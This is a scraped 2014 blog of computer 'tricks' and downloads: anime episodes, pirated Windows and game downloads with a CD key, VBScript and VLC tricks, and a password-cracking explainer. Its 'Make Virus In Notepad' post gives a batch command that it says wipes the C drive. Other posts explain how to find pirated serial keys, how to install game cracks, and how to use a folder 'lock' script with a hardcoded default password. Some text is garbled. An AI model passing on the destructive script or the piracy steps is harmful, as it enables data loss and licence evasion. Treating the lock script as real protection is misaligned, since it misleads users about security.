Friday, 21 February 2014

Beyblade Metal Fury Episode in HINDI

Beyblade Metal Fury EpisodeS 1-11 in HINDI



Beyblade: Metal Fury, known in Japan as Metal Fight Beyblade 4D (メタルファイト ベイブレード 4D Metaru Faito Beibrēdo Fō Dī) is the 2011 sequel and third installment of the Japanese animetelevision series based on Takafumi Adachi's manga series Beyblade: Metal Fusion, which itself is based on the Beyblade spinning top game from Takara Tomy and Hasbro.[1] Following directly after Beyblade: Metal Masters, the 52-episode series[2] is produced by d-rights and Nelvana under the direction of Kunihisa Sugishima.[3] The series features Gingka and company as they travel the world in search for the ten "Legendary Bladers" needed to defeat Nemesis, the God of Destruction. The season was first broadcast on TV Tokyo in Japan starting April 3, 2011. The season premiered in Tokyo on August 19, 2012 on Cartoon Network. It later premiered in USA on October 13, 2012 at 8am in Cartoon Network. It also premiered in Canada on January 26, 2013 at 11:30am on YTV and in Australia on April 30, 2013 at 7:30am on Channel Eleven. The series had its season finale on July 4, 2013, even though it had a missing episode Orion's Whereabouts. Due to the missing of that episode, Channel Eleven screened it on July 5, 2013, completing the whole season. This series began in Finland on MTV3 April 28, 2013 broadcasting every Sunday at 9:35 am. It is presented with a Finnish dub


Wednesday, 19 February 2014

Call Of Duty Modern Warfare Highly Compressed Download

    Call Of Duty Modern Warfare Highly Compressed Download



 System Requirement



Download COD modern warfare

CD key




STGU 4GLU E22S E8TM 8461



Call Of Duty GHOST Download Compressed

Call Of Duty GHOST Download Compressed



Tuesday, 18 February 2014

Windows 8.1 ISODownload With product Key

Windows 8.1 ISO Download With product Key


Windows 8.1 ISO released now and you can download from my blog full and free version



What’s New

  1. New calculator, sound recorder, video editing app.
  2. Internet Explorer 11 and powershell v4.0.
  3. The skydrive app is revamped and is much more usable now.
  4. The search app provides integrated search result from PC, web and apps.
  5. Improved App Store that can update the installed apps automatically
New Technologies
  1. Support for DirectX 11.2 and Resilient File System (ReFS)
  2. Full support for 3D printers.
  1. Live tiles can now be resized to smaller size. New extra large size for desktop tile.
  2. The colour of start screen can be changed to any colour instead of selecting from predefined colours as before.
  3. The biggest improvement in usability is that the the apps can be snapped to half of screen instead of either 25% or 75% earlier.
  4. There is now a visible start button.
  5. Now you can boot directly to desktop.

Windows 8.1 Download Links

Windows 8.1 ISO
English 64-bit (x64)

English 32-bit (x86)

Product Key


Make Led Light Dance of Keyboard

 Make Led Light Dance of Keyboard

How To Make Keyboard LED Dance ?
 1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
       2. Then save this file as led.vbs (.vbs is must)
       3. Open your save file and see your keyboard led blinking like disco lights.

How To Disable Blinking LED ?

       1. First open Task Manager (ctrl+alt+del)
       2. Then Go to process tab.
       3. Select wscript.exe 
       4. Click on End process.

Windows 8/8.1 Transformation pack for 7 and XP

Windows 8/8.1 Transformation pack for 7 and XP

Shortly after the release of Windows 8, users experience difficulty while using certain features of the system such as the start button amongst other relevant features of the operating system. Well the complaints were heard, and Microsoft developed an upgrade under the name Blue Windows, which is now called Windows 8.1.
The new upgrade is a better version of the windows 8, likewise it is of joy to users to have a friendly system to work with. For windows users with OS windows 7 while other users will wait a while to upgrade their transformation pack to have the windows 8.1 feel.
To download visit the links below to get the best of the windows 8.1 transformation pack.

Download Windows Transformation Pack

Download Windows 8.1 theme pack for Win 7

Download Windows 8.1 theme pack for Win XP

 Aero effect can be downloaded from here for those running window 7 starter and basic


Monday, 17 February 2014

Play Movie On Desktop

Play Movie On Desktop or Set A Movie As A Wallpaper

   1. Open VLC Media Player. If you don't have it download it frome Here.
   2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel
   3. Then Choose DirectX video output from output dropdown list
      as shown in below image .
Video wallpaper

   4. Save the changes ans restart VLC Media Player.
   5. Play any video you would like to set as your desktop wallpaper.
   6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper

   7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
   8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.
   9. Hope you like this simple trick share your thought about this trick in comment section.

Make Virus In Notepad

Make Virus In Notepad

computer virus

 1. Open Notepad and copy below code into it.


@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Enable God Mode In Your PC

 Enable God Mode In Your PC



                 windows 7 god mode

1. On your desktop right click and create a New Folder.
  2. Rename this folder to the code given below.


  3. Done now double click on this folder and you will have access to all your windows operating system settings.

Watch Star Wars movie in CMD

Watch Star Wars movie in CMD

This is very intersting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with. Without wasting time lets gets started.

       1. Go to start > Run and type in cmd and press enter
       2. Now type in telnet as shown below and press enter.
3. After that enter o as shown below and press enter.
4. Next enter as shown below and press enter.
6. Enjoy !! and dont miss to subscribe below .


Finding Ip Address Of A Website Using Command Prompt Or CMD

Finding Ip Address Of A Website Using Command Prompt Or CMD

1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.
3. It will take less then a second and come up with the results as shown below.
finding ip adddress of website


Awesome VLC Media Player Trick

Awesome VLC Media Player Trick

How To Do This Trick ?
  1. Open Vlc Media Player.
  2. Then Press Cltr + N
  3. Now Type "Screen://" (without quotes)
  4. Click on Play and watch this simple little trick

How To Find Serial Key By Using Google

How To Find Serial Key By Using Google

How To Find Serial Key Of Any Software ?

The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

    1. Go to Google
    2. Then type  Software Name 94FBR
  • Replace Software Name with the name of software whose serial key you want to find
  • Eg: To find serial key of Nero i will type Nero 94fbr
    3. Now press Enter and you will find serial key of software you are looking for as shown below.


Password Protect Any Folder Without Any Software

Password Protect Any Folder Without Any Software

How To Lock Folder ?
   1. Open Notepad and Copy code given below into it.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md MyFolder
echo MyFolder created successfully
goto End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Simple Trick To Convert A Webpage To PDF File

Simple Trick To Convert A Webpage To PDF File

In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started.

How To Save Web Page To PDF File ?

1. Open the Google Chrome Browser on your PC or MAC 
2. Then go to the web page that you want to convert as a PDF. 
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 
4. Now Change the destination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document

6 Most Common Password Cracking Methods And Their Countermeasures

6 Most Common Password Cracking Methods And Their Countermeasures

1. BruteForce Attack

Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computer and complexity of the password.

Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like "iloveu" or "password" can be cracked easily whereas computer will take years to crack passwords like "aN34lL00"

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers

In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.

Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. Check out below article to know more about Rats and Keyloggers.

4. Phishing

Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like (As you can see There are two "b"). Always make sure that websites url is correct. Check out below article to know more about phishing.

5. Rainbow Table

A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords. 

Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is d41d8cd98f00b204e9800998ecf8427e

Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

6. Guessing

This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

How To Remove All Your Google Web History?

How To Remove All Your Google Web History?

Follow these steps to partially or completely.

  • Step 1: Visit your Google History page at Alternatively, you can click the gear icon  on the upper right corner of a search results page, and then go to Search history.
  • Step 2: Click on the gear  icon again, and then go to Settings.

Step 3: Click on the delete all link. You'll be prompted for a confirmation. Click on Delete all again, and your entire search history is gone!

Step 4 (optional): Click on the Turn off button on the Settings page to stop Google from storing your history again
If you don't want to delete your entire history, you can select individual items from the History main page, and delete them. This, by no means, implies that Google has nothing more to do with your data. They still keep some of your information on their servers for auditing and other such purposes. But at least your personal data is off the line now, and isn't susceptible to leaking out into the wrong hands.

Assassin's Creed Revelations Free Download Highly Compressed PC Game Full Version

Assassin's Creed Revelations Free Download Highly Compressed PC Game Full Version

Game Information: 
Assassin's Creed: Revelations is a 2011 action and adventure stealth video game developed and published by Ubisoft. It was released for Xbox 360 and PlayStation 3 in November 2011, and for Microsoft Windows in December 2011. It is the fourth major installment in the Assassin's Creed series, a direct sequel to 2010's Assa
ssin's Creed: Brotherhood, and the final game in the 'Ezio trilogy.

System Requirements
OS: Windows XP/Vista/7. 
Processor System: Intel Core 2 Duo E4400-2.0GHZ or Better. 
RAM: 2GB or 1GB. 
HDD: Up to free space 6141MB. 
AGP: Radeon HD2600XT or GeForce 8600 GTS-256MB or better uses. 
System of files: FAT/NTFS.
Installation Instructions
Download All Parts and Extract Part 1 with WinRAR 
Install Game and Go to Crack Folder 
Copy All Files and Paste into These Directory C:\Program Files\Ubisoft\Ubisoft Game Launcher 
Go to 40 Folder and copy the files to C: Users AppData Local Ubisoft Game 
Launcher savegame_storage dG9tZWsxMTY2 40 
Install Assassin Creed Revelations update 1.3 
Start the game file AssassinsCreedRevelations.exe Enjoy
Assassin's Creed Revelations Free Download Full Version For PC

Assassin's Creed Highly Compressed

Assassin's Creed Highly Compressed Download



The Amazing Spiderman compressed download

The Amazing Spiderman Highly Compressed Download

The web-crawler returns during this Spider-Man journey supported the wonderful Spider-Man movie. Created as Associate in Nursing epilogue story occurring entirely when the events of the picture show, the sport options the come of free-roaming web-slinging everywhere town and organic process enhancements to navigation and combat, because the fresh Associate in Nursingointed Spider-Man is plunged into an all-new plot charged with protective Manhattan from a range of criminals.Developer: Beenox.

The Amazing Spider-Man game system requirements
Windows XP, windows 7
Dual core
2 GB
Hard disk
900 MB free disk space
32 MB Graphics Memory
Sound Card
DirectX 8
Version 8.1 or 9.0



Quick Heal Anti Virus Full Download

Quick Heal Antivirus Full

Quick Heal Total Security 2014 Features:
• Core Protection. The intelligent antivirus engine effectively detects and resolves threats (viruses, worms and other malware). The additional features like AntiSpyware, AntiMalware, AntiRootkit, Silent Firewall and IDS/IPS provide all round virus protection.
• Advanced DNAScan. The ingenious Quick Heal DNAScan technology is now enhanced to combine behavorial and characteristic inspection and monitoring of unsafe programs. This results in a clean, more up-to-date and accurate detection of threats.
• Improved Scan Engine. The revamped antivirus scan engine avoids rescanning files that have not been altered since the previous scan. This reduces system resource usage.
• Web Protection. Real time cloud security restricts access to malware infected websites. This feature gives internet security protection by blocking threats transferred through websites hosting malicious codes.
• Browser Sandbox. Running your web browser in Sandbox Browser gives you an uninterrupted and secure browsing experience. It provides internet security protection by acting like a screen between the PC’s operating system and the malicious threats. This feature now comes with a USB drive support.
• Data Theft Protection. Quick Heal Total Security prevents unauthorized copying of data using flash drives.
• Parental Control. Schedule, control and monitor Internet usage for your children. Configure parental control based on user accounts.
• Privacy Protection. Securely deletes sensitive data files to prevent recovery by any recovery tools. This ensures total security and confidentiality of valuable data.
• Import and Export Settings. Users can now import Quick Heal security settings from a single computer and export it to other computers. This is helpful in cases where reinstallations or multiple computer configurations are concerned.
• PC2Mobile Scan. Scans and cleans mobile phones, Smartphones and PDA’s from your PC.
• PCTuner. This facility guides you on how to speed up your PC. You can tune start-up applications, services and clean unwanted registry entries and files.
• USB Drive Protection. Best antivirus automatically scans external storage devices. Protects USB drives from autorun infections.
• Email Security. Quick Heal Total Security 2014 gives cloud-based email security that prevents phishing and infected emails from reaching your Inbox.
• Safe Mode Protection. This facility stops unauthorized users from changing Quick Heal security settings when the system is running on Safe Mode.
• Enhanced Self-Protection. The Self-protection feature now protects Quick Heal’s running processes and services.
• Silent Mode. Suppresses prompts across all Quick Heal antivirus modules thereby reducing system load and allowing uninterrupted PC usage.
• Stay Connected. Quick Heal Total Security 2014 users now have direct access to our Facebook and Twitter pages with just a click.

Supported OS: Windows 2000, XP, Vista, Windows 7, Windows 8, Windows 8.1 (32-bit & 64-bit).

Quick Heal 32 bit

Quick Heal 64 bit







OTBA (open text based assessment) material and sample question

The new Open Book Exam will be taken along with March 2014 examination. CBSE has issued material for open-text-based assessment (OTBA) for classes 9th and 11th for March 2014 examination. Sample Questions are also given along with the text material. Download open text based assessment material using the link below :

click here to download OTBA material for classs 9

The following may please be noted in this regard:
  • The given Open text material is for use in Summative Assessment II of Class IX, and Annual Examination of Class XI, 2014.
  • The Hindi versions of the open text material will also be uploaded very soon.
  • Each text material includes sample questions.
The concerned teachers are expected to read, discuss and analyze them with regard to:
  • their objectives and outcomes
  • concepts involved and their application
  • description, further explanation and further exploration of the case/ problem/ situation involved.
  • higher order thinking skills involved, and
  • analysis from different perspectives
They should assign this text material to their students in groups for further understanding, analysis and discussion. It is reiterated here that the main objective of introducing OTBA is to relieve the students from the burden of mugging up of content and provide opportunities in acquiring skills of information processing, comprehension, analysis and inference. The teachers should guide them, provide feedback and encourage open responses in solving situations. The Text also gives some questions as samples.
The teachers should develop more such questions which are based on the given text but require answers through application of concepts, further extrapolation, comparison and inference

OTBA sample question paper